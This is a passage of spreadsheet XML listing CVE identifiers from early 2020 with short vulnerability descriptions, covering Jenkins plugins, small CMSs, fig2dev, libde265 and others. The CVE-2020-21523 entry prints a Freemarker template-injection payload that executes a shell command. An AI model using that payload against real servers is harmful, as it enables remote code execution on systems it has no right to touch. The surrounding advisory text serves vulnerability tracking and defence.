  <si>
    <t>A cross-site scripting (XSS) vulnerability in the parameter type_en of Maccms 10 allows attackers to obtain the administrator cookie and escalate privileges via a crafted payload.</t>
  </si>
  <si>
    <t>CVE-2020-2139</t>
  </si>
  <si>
    <t>An arbitrary file write vulnerability in Jenkins Cobertura Plugin 1.15 and earlier allows attackers able to control the coverage report file contents to overwrite any file on the Jenkins master file system.</t>
  </si>
  <si>
    <t>CVE-2020-21394</t>
  </si>
  <si>
    <t>SQL Injection vulnerability in Zhong Bang Technology Co., Ltd CRMEB mall system V2.60 and V3.1 via the tablename parameter in SystemDatabackup.php.</t>
  </si>
  <si>
    <t>CVE-2020-2140</t>
  </si>
  <si>
    <t>Jenkins Audit Trail Plugin 3.2 and earlier does not escape the error message for the URL Patterns field form validation, resulting in a reflected cross-site scripting vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-21405</t>
  </si>
  <si>
    <t>An issue was discovered in H96 Smart TV Box H96 Pro Plus allows attackers to corrupt files via calls to the saveDeepColorAttr service.unk</t>
  </si>
  <si>
    <t>CVE-2020-21406</t>
  </si>
  <si>
    <t>An issue was discovered in RK Smart TV Box MAX and V88 SmartTV box that allows attackers to cause a denial of service via the switchNextDisplayInterface service.</t>
  </si>
  <si>
    <t>CVE-2020-2141</t>
  </si>
  <si>
    <t>A cross-site request forgery vulnerability in Jenkins P4 Plugin 1.10.10 and earlier allows attackers to trigger builds or add a labels in Perforce.</t>
  </si>
  <si>
    <t>CVE-2020-2142</t>
  </si>
  <si>
    <t>A missing permission check in Jenkins P4 Plugin 1.10.10 and earlier allows attackers with Overall/Read permission to trigger builds.</t>
  </si>
  <si>
    <t>CVE-2020-2143</t>
  </si>
  <si>
    <t>Jenkins Logstash Plugin 2.3.1 and earlier transmits configured credentials in plain text as part of its global Jenkins configuration form, potentially resulting in their exposure.</t>
  </si>
  <si>
    <t>CVE-2020-21431</t>
  </si>
  <si>
    <t>HongCMS v3.0 contains an arbitrary file read and write vulnerability in the component /admin/index.php/template/edit.</t>
  </si>
  <si>
    <t>CVE-2020-21434</t>
  </si>
  <si>
    <t>Maccms 10 contains a cross-site scripting (XSS) vulnerability in the Editing function under the Member module. This vulnerability is exploited via a crafted payload in the nickname text field.</t>
  </si>
  <si>
    <t>CVE-2020-2144</t>
  </si>
  <si>
    <t>Jenkins Rundeck Plugin 3.6.6 and earlier does not configure its XML parser to prevent XML external entity (XXE) attacks.</t>
  </si>
  <si>
    <t>CVE-2020-2145</t>
  </si>
  <si>
    <t>Jenkins Zephyr Enterprise Test Management Plugin 1.9.1 and earlier stores its Zephyr password in plain text on the Jenkins master file system.</t>
  </si>
  <si>
    <t>CVE-2020-21452</t>
  </si>
  <si>
    <t>An issue was discovered in uniview ISC2500-S. This is an upload vulnerability where an attacker can upload malicious code via /Interface/DevManage/EC.php?cmd=upload</t>
  </si>
  <si>
    <t>CVE-2020-2146</t>
  </si>
  <si>
    <t>Jenkins Mac Plugin 1.1.0 and earlier does not validate SSH host keys when connecting agents created by the plugin, enabling man-in-the-middle attacks.</t>
  </si>
  <si>
    <t>CVE-2020-21468</t>
  </si>
  <si>
    <t>** DISPUTED ** A segmentation fault in the redis-server component of Redis 5.0.7 leads to a denial of service (DOS). NOTE: the vendor cannot reproduce this issue in a released version, such as 5.0.7.</t>
  </si>
  <si>
    <t>CVE-2020-2147</t>
  </si>
  <si>
    <t>A cross-site request forgery vulnerability in Jenkins Mac Plugin 1.1.0 and earlier allows attackers to connect to an attacker-specified SSH server using attacker-specified credentials.</t>
  </si>
  <si>
    <t>CVE-2020-2148</t>
  </si>
  <si>
    <t>A missing permission check in Jenkins Mac Plugin 1.1.0 and earlier allows attackers with Overall/Read permission to connect to an attacker-specified SSH server using attacker-specified credentials.</t>
  </si>
  <si>
    <t>CVE-2020-21480</t>
  </si>
  <si>
    <t>An arbitrary file write vulnerability in RGCMS v1.06 allows attackers to execute arbitrary code via a crafted PHP file.</t>
  </si>
  <si>
    <t>CVE-2020-21481</t>
  </si>
  <si>
    <t>An arbitrary file upload vulnerability in RGCMS v1.06 allows attackers to execute arbitrary code via a crafted .txt file which is later changed to a PHP file.</t>
  </si>
  <si>
    <t>CVE-2020-21482</t>
  </si>
  <si>
    <t>A cross-site scripting (XSS) vulnerability in RGCMS v1.06 allows attackers to obtain the administrator's cookie via a crafted payload in the Name field under the Message Board module</t>
  </si>
  <si>
    <t>CVE-2020-21483</t>
  </si>
  <si>
    <t>An arbitrary file upload vulnerability in Jizhicms v1.5 allows attackers to execute arbitrary code via a crafted .jpg file which is later changed to a PHP file.</t>
  </si>
  <si>
    <t>CVE-2020-2149</t>
  </si>
  <si>
    <t>Jenkins Repository Connector Plugin 1.2.6 and earlier transmits configured credentials in plain text as part of its global Jenkins configuration form, potentially resulting in their exposure.</t>
  </si>
  <si>
    <t>CVE-2020-21493</t>
  </si>
  <si>
    <t>An issue in the component route\user.php of Xiuno BBS v4.0.4 allows attackers to enumerate usernames.</t>
  </si>
  <si>
    <t>CVE-2020-21494</t>
  </si>
  <si>
    <t>A cross-site scripting (XSS) vulnerability in the component install\install.sql of Xiuno BBS 4.0.4 allows attackers to execute arbitrary web scripts or HTML via changing the doctype value to 0.</t>
  </si>
  <si>
    <t>CVE-2020-21495</t>
  </si>
  <si>
    <t>A cross-site scripting (XSS) vulnerability in the component /admin/?setting-base.htm of Xiuno BBS 4.0.4 allows attackers to execute arbitrary web scripts or HTML via the sitename parameter.</t>
  </si>
  <si>
    <t>CVE-2020-21496</t>
  </si>
  <si>
    <t>A cross-site scripting (XSS) vulnerability in the component /admin/?setting-base.htm of Xiuno BBS 4.0.4 allows attackers to execute arbitrary web scripts or HTML via the sitebrief parameter.</t>
  </si>
  <si>
    <t>CVE-2020-2150</t>
  </si>
  <si>
    <t>Jenkins Sonar Quality Gates Plugin 1.3.1 and earlier transmits configured credentials in plain text as part of its global Jenkins configuration form, potentially resulting in their exposure.</t>
  </si>
  <si>
    <t>CVE-2020-21503</t>
  </si>
  <si>
    <t>waimai Super Cms 20150505 has a logic flaw allowing attackers to modify a price, before form submission, by observing data in a packet capture. By setting the index.php?m=gift&amp;a=addsave credit parameter to -1, the product is sold for free.</t>
  </si>
  <si>
    <t>CVE-2020-21504</t>
  </si>
  <si>
    <t>waimai Super Cms 20150505 contains a cross-site scripting (XSS) vulnerability in the component /admin.php?&amp;m=Public&amp;a=login.</t>
  </si>
  <si>
    <t>CVE-2020-21505</t>
  </si>
  <si>
    <t>waimai Super Cms 20150505 contains a cross-site scripting (XSS) vulnerability in the component /admin.php/Link/addsave.</t>
  </si>
  <si>
    <t>CVE-2020-21506</t>
  </si>
  <si>
    <t>waimai Super Cms 20150505 contains a cross-site scripting (XSS) vulnerability in the component /admin.php?m=Config&amp;a=add.</t>
  </si>
  <si>
    <t>CVE-2020-2151</t>
  </si>
  <si>
    <t>Jenkins Quality Gates Plugin 2.5 and earlier transmits configured credentials in plain text as part of its global Jenkins configuration form, potentially resulting in their exposure.</t>
  </si>
  <si>
    <t>CVE-2020-21516</t>
  </si>
  <si>
    <t>There is an arbitrary file upload vulnerability in FeehiCMS 2.0.8 at the head image upload, that allows attackers to execute relevant PHP code.</t>
  </si>
  <si>
    <t>CVE-2020-21517</t>
  </si>
  <si>
    <t>Cross Site Scripting (XSS) vulnerability in MetInfo 7.0.0 via the gourl parameter in login.php.</t>
  </si>
  <si>
    <t>CVE-2020-2152</t>
  </si>
  <si>
    <t>Jenkins Subversion Release Manager Plugin 1.2 and earlier does not escape the error message for the Repository URL field form validation, resulting in a reflected cross-site scripting vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-21522</t>
  </si>
  <si>
    <t>An issue was discovered in halo V1.1.3. A Zip Slip Directory Traversal Vulnerability in the backend,the attacker can overwrite some files, such as ftl files, .bashrc files in the user directory, and finally get the permissions of the operating system.</t>
  </si>
  <si>
    <t>CVE-2020-21523</t>
  </si>
  <si>
    <t>A Server-Side Freemarker template injection vulnerability in halo CMS v1.1.3 In the Edit Theme File function. The ftl file can be edited. This is the Freemarker template file. This file can cause arbitrary code execution when it is rendered in the background. exp: &lt;#assign test="freemarker.template.utility.Execute"?new()&gt; ${test("touch /tmp/freemarkerPwned")}</t>
  </si>
  <si>
    <t>CVE-2020-21524</t>
  </si>
  <si>
    <t>There is a XML external entity (XXE) vulnerability in halo v1.1.3, The function of importing other blogs in the background(/api/admin/migrations/wordpress) needs to parse the xml file, but it is not used for security defense, This vulnerability can detect the intranet, read files, enable ddos attacks, etc. exp:https://github.com/halo-dev/halo/issues/423</t>
  </si>
  <si>
    <t>CVE-2020-21525</t>
  </si>
  <si>
    <t>Halo V1.1.3 is affected by: Arbitrary File reading. In an interface that reads files in halo v1.1.3, a directory traversal check is performed on the input path parameter, but the startsWith function can be used to bypass it.</t>
  </si>
  <si>
    <t>CVE-2020-21526</t>
  </si>
  <si>
    <t>An Arbitrary file writing vulnerability in halo v1.1.3. In an interface to write files in the background, a directory traversal check is performed on the input path parameter, but the startsWith function can be used to bypass it.</t>
  </si>
  <si>
    <t>CVE-2020-21527</t>
  </si>
  <si>
    <t>There is an Arbitrary file deletion vulnerability in halo v1.1.3. A backup function in the background allows a user, when deleting their backup files, to delete any files on the system through directory traversal.</t>
  </si>
  <si>
    <t>CVE-2020-21529</t>
  </si>
  <si>
    <t>fig2dev 3.2.7b contains a stack buffer overflow in the bezier_spline function in genepic.c.</t>
  </si>
  <si>
    <t>CVE-2020-2153</t>
  </si>
  <si>
    <t>Jenkins Backlog Plugin 2.4 and earlier transmits configured credentials in plain text as part of job configuration forms, potentially resulting in their exposure.</t>
  </si>
  <si>
    <t>CVE-2020-21530</t>
  </si>
  <si>
    <t>fig2dev 3.2.7b contains a segmentation fault in the read_objects function in read.c.</t>
  </si>
  <si>
    <t>CVE-2020-21531</t>
  </si>
  <si>
    <t>fig2dev 3.2.7b contains a global buffer overflow in the conv_pattern_index function in gencgm.c.</t>
  </si>
  <si>
    <t>CVE-2020-21532</t>
  </si>
  <si>
    <t>fig2dev 3.2.7b contains a global buffer overflow in the setfigfont function in genepic.c.</t>
  </si>
  <si>
    <t>CVE-2020-21533</t>
  </si>
  <si>
    <t>fig2dev 3.2.7b contains a stack buffer overflow in the read_textobject function in read.c.</t>
  </si>
  <si>
    <t>CVE-2020-21534</t>
  </si>
  <si>
    <t>fig2dev 3.2.7b contains a global buffer overflow in the get_line function in read.c.</t>
  </si>
  <si>
    <t>CVE-2020-21535</t>
  </si>
  <si>
    <t>fig2dev 3.2.7b contains a segmentation fault in the gencgm_start function in gencgm.c.</t>
  </si>
  <si>
    <t>CVE-2020-2154</t>
  </si>
  <si>
    <t>Jenkins Zephyr for JIRA Test Management Plugin 1.5 and earlier stores its credentials in plain text in a global configuration file on the Jenkins master file system.</t>
  </si>
  <si>
    <t>CVE-2020-21547</t>
  </si>
  <si>
    <t>Libsixel 1.8.2 contains a heap-based buffer overflow in the dither_func_fs function in tosixel.c.</t>
  </si>
  <si>
    <t>CVE-2020-21548</t>
  </si>
  <si>
    <t>Libsixel 1.8.3 contains a heap-based buffer overflow in the sixel_encode_highcolor function in tosixel.c.</t>
  </si>
  <si>
    <t>CVE-2020-2155</t>
  </si>
  <si>
    <t>Jenkins OpenShift Deployer Plugin 1.2.0 and earlier transmits configured credentials in plain text as part of its global Jenkins configuration form, potentially resulting in their exposure.</t>
  </si>
  <si>
    <t>CVE-2020-21554</t>
  </si>
  <si>
    <t>A File Deletion vulnerability exists in TinyShop 3.1.1 in the back_list parameter in controllers\admin.php, which could let a malicious user delete any file such as install.lock to reinstall cms.</t>
  </si>
  <si>
    <t>CVE-2020-2156</t>
  </si>
  <si>
    <t>Jenkins DeployHub Plugin 8.0.14 and earlier transmits configured credentials in plain text as part of job configuration forms, potentially resulting in their exposure.</t>
  </si>
  <si>
    <t>CVE-2020-21564</t>
  </si>
  <si>
    <t>An issue was discovered in Pluck CMS 4.7.10-dev2 and 4.7.11. There is a file upload vulnerability that can cause a remote command execution via admin.php?action=files.</t>
  </si>
  <si>
    <t>CVE-2020-2157</t>
  </si>
  <si>
    <t>Jenkins Skytap Cloud CI Plugin 2.07 and earlier transmits configured credentials in plain text as part of job configuration forms, potentially resulting in their exposure.</t>
  </si>
  <si>
    <t>CVE-2020-21572</t>
  </si>
  <si>
    <t>Buffer overflow vulnerability in function src_parser_trans_stage_1_2_3 trgil gilcc before commit 803969389ca9c06237075a7f8eeb1a19e6651759, allows attackers to cause a denial of service.</t>
  </si>
  <si>
    <t>CVE-2020-21573</t>
  </si>
  <si>
    <t>An issue was discoverered in in abhijitnathwani image-processing v0.1.0, allows local attackers to cause a denial of service via a crafted image file.</t>
  </si>
  <si>
    <t>CVE-2020-21574</t>
  </si>
  <si>
    <t>Buffer overflow vulnerability in YotsuyaNight c-http v0.1.0, allows attackers to cause a denial of service via a long url request which is passed to the delimitedread function.</t>
  </si>
  <si>
    <t>CVE-2020-2158</t>
  </si>
  <si>
    <t>Jenkins Literate Plugin 1.0 and earlier does not configure its YAML parser to prevent the instantiation of arbitrary types, resulting in a remote code execution vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-21585</t>
  </si>
  <si>
    <t>Vulnerability in emlog v6.0.0 allows user to upload webshells via zip plugin module.</t>
  </si>
  <si>
    <t>CVE-2020-21588</t>
  </si>
  <si>
    <t>Buffer overflow in Core FTP LE v2.2 allows local attackers to cause a denial or service (crash) via a long string in the Setup-&gt;Users-&gt;Username editbox.</t>
  </si>
  <si>
    <t>CVE-2020-2159</t>
  </si>
  <si>
    <t>Jenkins CryptoMove Plugin 0.1.33 and earlier allows attackers with Job/Configure access to execute arbitrary OS commands on the Jenkins master as the OS user account running Jenkins.</t>
  </si>
  <si>
    <t>CVE-2020-21590</t>
  </si>
  <si>
    <t>Directory traversal in coreframe/app/template/admin/index.php in WUZHI CMS 4.1.0 allows attackers to list files in arbitrary directories via the dir parameter.</t>
  </si>
  <si>
    <t>CVE-2020-21594</t>
  </si>
  <si>
    <t>libde265 v1.0.4 contains a heap buffer overflow in the put_epel_hv_fallback function, which can be exploited via a crafted a file.</t>
  </si>
  <si>
    <t>CVE-2020-21595</t>
  </si>
  <si>
    <t>libde265 v1.0.4 contains a heap buffer overflow in the mc_luma function, which can be exploited via a crafted a file.</t>
  </si>
  <si>
    <t>CVE-2020-21596</t>
  </si>
  <si>
    <t>libde265 v1.0.4 contains a global buffer overflow in the decode_CABAC_bit function, which can be exploited via a crafted a file.</t>
  </si>
  <si>
    <t>CVE-2020-21597</t>
  </si>
  <si>
    <t>libde265 v1.0.4 contains a heap buffer overflow in the mc_chroma function, which can be exploited via a crafted a file.</t>
  </si>
  <si>
    <t>CVE-2020-21598</t>
  </si>
  <si>
    <t>libde265 v1.0.4 contains a heap buffer overflow in the ff_hevc_put_unweighted_pred_8_sse function, which can be exploited via a crafted a file.</t>
  </si>
  <si>
    <t>CVE-2020-21599</t>
  </si>
  <si>
    <t>libde265 v1.0.4 contains a heap buffer overflow in the de265_image::available_zscan function, which can be exploited via a crafted a file.</t>
  </si>
  <si>
    <t>CVE-2020-2160</t>
  </si>
  <si>
    <t>Jenkins 2.227 and earlier, LTS 2.204.5 and earlier uses different representations of request URL paths, which allows attackers to craft URLs that allow bypassing CSRF protection of any target URL.</t>
  </si>
  <si>
    <t>CVE-2020-21600</t>
  </si>
  <si>
    <t>libde265 v1.0.4 contains a heap buffer overflow in the put_weighted_pred_avg_16_fallback function, which can be exploited via a crafted a file.</t>
  </si>
  <si>
    <t>CVE-2020-21601</t>
  </si>
  <si>
    <t>libde265 v1.0.4 contains a stack buffer overflow in the put_qpel_fallback function, which can be exploited via a crafted a file.</t>
  </si>
  <si>
    <t>CVE-2020-21602</t>
  </si>
  <si>
    <t>libde265 v1.0.4 contains a heap buffer overflow in the put_weighted_bipred_16_fallback function, which can be exploited via a crafted a file.</t>
  </si>
  <si>
    <t>CVE-2020-21603</t>
  </si>
  <si>
    <t>libde265 v1.0.4 contains a heap buffer overflow in the put_qpel_0_0_fallback_16 function, which can be exploited via a crafted a file.</t>
  </si>
  <si>
    <t>CVE-2020-21604</t>
  </si>
  <si>
    <t>libde265 v1.0.4 contains a heap buffer overflow fault in the _mm_loadl_epi64 function, which can be exploited via a crafted a file.</t>
  </si>
  <si>
    <t>CVE-2020-21605</t>
  </si>
  <si>
    <t>libde265 v1.0.4 contains a segmentation fault in the apply_sao_internal function, which can be exploited via a crafted a file.</t>
  </si>
  <si>
    <t>CVE-2020-21606</t>
  </si>
  <si>
    <t>libde265 v1.0.4 contains a heap buffer overflow fault in the put_epel_16_fallback function, which can be exploited via a crafted a file.</t>
  </si>
  <si>
    <t>CVE-2020-2161</t>
  </si>
  <si>
    <t>Jenkins 2.227 and earlier, LTS 2.204.5 and earlier does not properly escape node labels that are shown in the form validation for label expressions on job configuration pages, resulting in a stored XSS vulnerability exploitable by users able to define node labels.</t>
  </si>
  <si>
    <t>CVE-2020-2162</t>
  </si>
  <si>
    <t>Jenkins 2.227 and earlier, LTS 2.204.5 and earlier does not set Content-Security-Policy headers for files uploaded as file parameters to a build, resulting in a stored XSS vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-21627</t>
  </si>
  <si>
    <t>Ruijie RG-UAC commit 9071227 was discovered to contain a vulnerability in the component /current_action.php?action=reboot, which allows attackers to cause a denial of service (DoS) via unspecified vectors.</t>
  </si>
  <si>
    <t>CVE-2020-2163</t>
  </si>
  <si>
    <t>Jenkins 2.227 and earlier, LTS 2.204.5 and earlier improperly processes HTML content of list view column headers, resulting in a stored XSS vulnerability exploitable by users able to control column headers.</t>
  </si>
  <si>
    <t>CVE-2020-21639</t>
  </si>
  <si>
    <t>Ruijie RG-UAC 6000-E50 commit 9071227 was discovered to contain a cross-site scripting (XSS) vulnerability via the rule_name parameter. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload.</t>
  </si>
  <si>
    <t>CVE-2020-2164</t>
  </si>
  <si>
    <t>Jenkins Artifactory Plugin 3.5.0 and earlier stores its Artifactory server password unencrypted in its global configuration file on the Jenkins master where it can be viewed by users with access to the master file system.</t>
  </si>
  <si>
    <t>CVE-2020-21641</t>
  </si>
  <si>
    <t>Out-of-Band XML External Entity (OOB-XXE) vulnerability in Zoho ManageEngine Analytics Plus before 4.3.5 allows remote attackers to read arbitrary files, enumerate folders and scan internal ports via crafted XML license file.</t>
  </si>
  <si>
    <t>CVE-2020-21642</t>
  </si>
  <si>
    <t>Directory Traversal vulnerability ZDBQAREFSUBDIR parameter in /zropusermgmt API in Zoho ManageEngine Analytics Plus before 4350 allows remote attackers to run arbitrary code.</t>
  </si>
  <si>
    <t>CVE-2020-21648</t>
  </si>
  <si>
    <t>WDJA CMS v1.5.2 contains an arbitrary file deletion vulnerability in the component admin/cache/manage.php.</t>
  </si>
  <si>
    <t>CVE-2020-21649</t>
  </si>
  <si>
    <t>Myucms v2.2.1 contains a server-side request forgery (SSRF) in the component \controller\index.php, which can be exploited via the sql() method.</t>
  </si>
  <si>
    <t>CVE-2020-2165</t>
  </si>
  <si>
    <t>Jenkins Artifactory Plugin 3.6.0 and earlier transmits configured passwords in plain text as part of its global Jenkins configuration form, potentially resulting in their exposure.</t>
  </si>
  <si>
    <t>CVE-2020-21650</t>
  </si>
  <si>
    <t>Myucms v2.2.1 contains a remote code execution (RCE) vulnerability in the component \controller\Config.php, which can be exploited via the add() method.</t>
  </si>
  <si>
    <t>CVE-2020-21651</t>
  </si>
  <si>
    <t>Myucms v2.2.1 contains a remote code execution (RCE) vulnerability in the component \controller\point.php, which can be exploited via the add() method.</t>
  </si>
  <si>
    <t>CVE-2020-21652</t>
  </si>
  <si>
    <t>Myucms v2.2.1 contains a remote code execution (RCE) vulnerability in the component \controller\Config.php, which can be exploited via the addqq() method.</t>
  </si>
  <si>
    <t>CVE-2020-21653</t>
  </si>
  <si>
    <t>Myucms v2.2.1 contains a server-side request forgery (SSRF) in the component \controller\index.php, which can be exploited via the sj() method.</t>
  </si>
  <si>
    <t>CVE-2020-21654</t>
  </si>
  <si>
    <t>emlog v6.0 contains a vulnerability in the component admin\template.php, which allows attackers to getshell via a crafted Zip file.</t>
  </si>
  <si>
    <t>CVE-2020-21656</t>
  </si>
  <si>
    <t>XYHCMS v3.6 contains a stored cross-site scripting (XSS) vulnerability in the component xyhai.php?s=/Link/index.</t>
  </si>
  <si>
    <t>CVE-2020-21658</t>
  </si>
  <si>
    <t>A Cross-Site Request Forgery (CSRF) in WDJA CMS v1.5.2 allows attackers to arbitrarily add administrator accounts via a crafted URL.</t>
  </si>
  <si>
    <t>CVE-2020-2166</t>
  </si>
  <si>
    <t>Jenkins Pipeline: AWS Steps Plugin 1.40 and earlier does not configure its YAML parser to prevent the instantiation of arbitrary types, resulting in a remote code execution vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-21665</t>
  </si>
  <si>
    <t>In fastadmin V1.0.0.20191212_beta, when a user with administrator rights has logged in, a malicious parameter can be passed for SQL injection in URL /admin/ajax/weigh.</t>
  </si>
  <si>
    <t>CVE-2020-21667</t>
  </si>
  <si>
    <t>In fastadmin-tp6 v1.0, in the file app/admin/controller/Ajax.php the 'table' parameter passed is not filtered so a malicious parameter can be passed for SQL injection.</t>
  </si>
  <si>
    <t>CVE-2020-2167</t>
  </si>
  <si>
    <t>Jenkins OpenShift Pipeline Plugin 1.0.56 and earlier does not configure its YAML parser to prevent the instantiation of arbitrary types, resulting in a remote code execution vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-21674</t>
  </si>
  <si>
    <t>Heap-based buffer overflow in archive_string_append_from_wcs() (archive_string.c) in libarchive-3.4.1dev allows remote attackers to cause a denial of service (out-of-bounds write in heap memory resulting into a crash) via a crafted archive file. NOTE: this only affects users who downloaded the development code from GitHub. Users of the product's official releases are unaffected.</t>
  </si>
  <si>
    <t>CVE-2020-21675</t>
  </si>
  <si>
    <t>A stack-based buffer overflow in the genptk_text component in genptk.c of fig2dev 3.2.7b allows attackers to cause a denial of service (DOS) via converting a xfig file into ptk format.</t>
  </si>
  <si>
    <t>CVE-2020-21676</t>
  </si>
  <si>
    <t>A stack-based buffer overflow in the genpstrx_text() component in genpstricks.c of fig2dev 3.2.7b allows attackers to cause a denial of service (DOS) via converting a xfig file into pstricks format.</t>
  </si>
  <si>
    <t>CVE-2020-21677</t>
  </si>
  <si>
    <t>A heap-based buffer overflow in the sixel_encoder_output_without_macro function in encoder.c of Libsixel 1.8.4 allows attackers to cause a denial of service (DOS) via converting a crafted PNG file into Sixel format.</t>
  </si>
  <si>
    <t>CVE-2020-21678</t>
  </si>
  <si>
    <t>A global buffer overflow in the genmp_writefontmacro_latex component in genmp.c of fig2dev 3.2.7b allows attackers to cause a denial of service (DOS) via converting a xfig file into mp format.</t>
  </si>
  <si>
    <t>CVE-2020-2168</t>
  </si>
  <si>
    <t>Jenkins Azure Container Service Plugin 1.0.1 and earlier does not configure its YAML parser to prevent the instantiation of arbitrary types, resulting in a remote code execution vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-21680</t>
  </si>
  <si>
    <t>A stack-based buffer overflow in the put_arrow() component in genpict2e.c of fig2dev 3.2.7b allows attackers to cause a denial of service (DOS) via converting a xfig file into pict2e format.</t>
  </si>
  <si>
    <t>CVE-2020-21681</t>
  </si>
  <si>
    <t>A global buffer overflow in the set_color component in genge.c of fig2dev 3.2.7b allows attackers to cause a denial of service (DOS) via converting a xfig file into ge format.</t>
  </si>
  <si>
    <t>CVE-2020-21682</t>
  </si>
  <si>
    <t>A global buffer overflow in the set_fill component in genge.c of fig2dev 3.2.7b allows attackers to cause a denial of service (DOS) via converting a xfig file into ge format.</t>
  </si>
  <si>
    <t>CVE-2020-21683</t>
  </si>
  <si>
    <t>A global buffer overflow in the shade_or_tint_name_after_declare_color in genpstricks.c of fig2dev 3.2.7b allows attackers to cause a denial of service (DOS) via converting a xfig file into pstricks format.</t>
  </si>
  <si>
    <t>CVE-2020-21684</t>
  </si>
  <si>
    <t>A global buffer overflow in the put_font in genpict2e.c of fig2dev 3.2.7b allows attackers to cause a denial of service (DOS) via converting a xfig file into pict2e format.</t>
  </si>
  <si>
    <t>CVE-2020-21688</t>
  </si>
  <si>
    <t>A heap-use-after-free in the av_freep function in libavutil/mem.c of FFmpeg 4.2 allows attackers to execute arbitrary code.</t>
  </si>
  <si>
    <t>CVE-2020-2169</t>
  </si>
  <si>
    <t>A form validation endpoint in Jenkins Queue cleanup Plugin 1.3 and earlier does not properly escape a query parameter displayed in an error message, resulting in a reflected XSS vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-21697</t>
  </si>
  <si>
    <t>A heap-use-after-free in the mpeg_mux_write_packet function in libavformat/mpegenc.c of FFmpeg 4.2 allows to cause a denial of service (DOS) via a crafted avi file.</t>
  </si>
  <si>
    <t>CVE-2020-2170</t>
  </si>
  <si>
    <t>Jenkins RapidDeploy Plugin 4.2 and earlier does not escape package names in the table of packages obtained from a remote server, resulting in a stored XSS vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-2171</t>
  </si>
  <si>
    <t>Jenkins RapidDeploy Plugin 4.2 and earlier does not configure its XML parser to prevent XML external entity (XXE) attacks.</t>
  </si>
  <si>
    <t>CVE-2020-2172</t>
  </si>
  <si>
    <t>Jenkins Code Coverage API Plugin 1.1.4 and earlier does not configure its XML parser to prevent XML external entity (XXE) attacks.</t>
  </si>
  <si>
    <t>CVE-2020-21725</t>
  </si>
  <si>
    <t>OpenSNS v6.1.0 contains a blind SQL injection vulnerability in /Controller/ChinaCityController.class.php via the pid parameter.</t>
  </si>
  <si>
    <t>CVE-2020-21726</t>
  </si>
  <si>
    <t>OpenSNS v6.1.0 contains a blind SQL injection vulnerability in /Controller/ChinaCityController.class.php via the cid parameter.</t>
  </si>
  <si>
    <t>CVE-2020-21729</t>
  </si>
  <si>
    <t>JEECMS x1.1 contains a stored cross-site scripting (XSS) vulnerability in the component of /member-vipcenter.htm, which allows attackers to execute arbitrary web scripts or HTML via a crafted payload.</t>
  </si>
  <si>
    <t>CVE-2020-2173</t>
  </si>
  <si>
    <t>Jenkins Gatling Plugin 1.2.7 and earlier prevents Content-Security-Policy headers from being set for Gatling reports served by the plugin, resulting in an XSS vulnerability exploitable by users able to change report content.</t>
  </si>
  <si>
    <t>CVE-2020-21731</t>
  </si>
  <si>
    <t>Gazie 7.29 is affected by: Cross Site Scripting (XSS) via http://192.168.100.7/gazie/modules/config/admin_utente.php?user_name=amministratore&amp;Update. An attacker can inject JavaScript code, and the webapplication stores the injected code.</t>
  </si>
  <si>
    <t>CVE-2020-21732</t>
  </si>
  <si>
    <t>Rukovoditel Project Management app 2.6 is affected by: Cross Site Scripting (XSS). An attacker can add JavaScript code to the filename.</t>
  </si>
  <si>
    <t>CVE-2020-21733</t>
  </si>
  <si>
    <t>Sagemcom F@ST3686 v1.0 HUN 3.97.0 has XSS via RgDiagnostics.asp, RgDdns.asp, RgFirewallEL.asp, RgVpnL2tpPptp.asp.</t>
  </si>
  <si>
    <t>CVE-2020-2174</t>
  </si>
  <si>
    <t>Jenkins AWSEB Deployment Plugin 0.3.19 and earlier does not escape various values printed as part of form validation output, resulting in a reflected cross-site scripting vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-2175</t>
  </si>
  <si>
    <t>Jenkins FitNesse Plugin 1.31 and earlier does not correctly escape report contents before showing them on the Jenkins UI, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by users able to control the XML input files processed by the plugin.</t>
  </si>
  <si>
    <t>CVE-2020-2176</t>
  </si>
  <si>
    <t>Multiple form validation endpoints in Jenkins useMango Runner Plugin 1.4 and earlier do not escape values received from the useMango service, resulting in a cross-site scripting (XSS) vulnerability exploitable by users able to control the values returned from the useMango service.</t>
  </si>
  <si>
    <t>CVE-2020-2177</t>
  </si>
  <si>
    <t>Jenkins Copr Plugin 0.3 and earlier stores credentials unencrypted in job config.xml files on the Jenkins master where they can be viewed by users with Extended Read permission, or access to the master file system.</t>
  </si>
  <si>
    <t>CVE-2020-2178</t>
  </si>
  <si>
    <t>Jenkins Parasoft Findings Plugin 10.4.3 and earlier does not configure its XML parser to prevent XML external entity (XXE) attacks.</t>
  </si>
  <si>
    <t>CVE-2020-21783</t>
  </si>
  <si>
    <t>In IBOS 4.5.4 the email function has a cross site scripting (XSS) vulnerability in emailbody[content] parameter.</t>
  </si>
  <si>
    <t>CVE-2020-21784</t>
  </si>
  <si>
    <t>phpwcms 1.9.13 is vulnerable to Code Injection via /phpwcms/setup/setup.php.</t>
  </si>
  <si>
    <t>CVE-2020-21785</t>
  </si>
  <si>
    <t>In IBOS 4.5.4 Open, the database backup has Command Injection Vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-21786</t>
  </si>
  <si>
    <t>In IBOS 4.5.4 Open, Arbitrary File Inclusion causes getshell via /system/modules/dashboard/controllers/CronController.php.</t>
  </si>
  <si>
    <t>CVE-2020-21787</t>
  </si>
  <si>
    <t>CRMEB 3.1.0+ is vulnerable to File Upload Getshell via /crmeb/crmeb/services/UploadService.php.</t>
  </si>
  <si>
    <t>CVE-2020-21788</t>
  </si>
  <si>
    <t>In CRMEB 3.1.0+ strict domain name filtering leads to SSRF(Server-Side Request Forgery). The vulnerable code is in file /crmeb/app/admin/controller/store/CopyTaobao.php.</t>
  </si>
  <si>
    <t>CVE-2020-2179</t>
  </si>
  <si>
    <t>Jenkins Yaml Axis Plugin 0.2.0 and earlier does not configure its YAML parser to prevent the instantiation of arbitrary types, resulting in a remote code execution vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-2180</t>
  </si>
  <si>
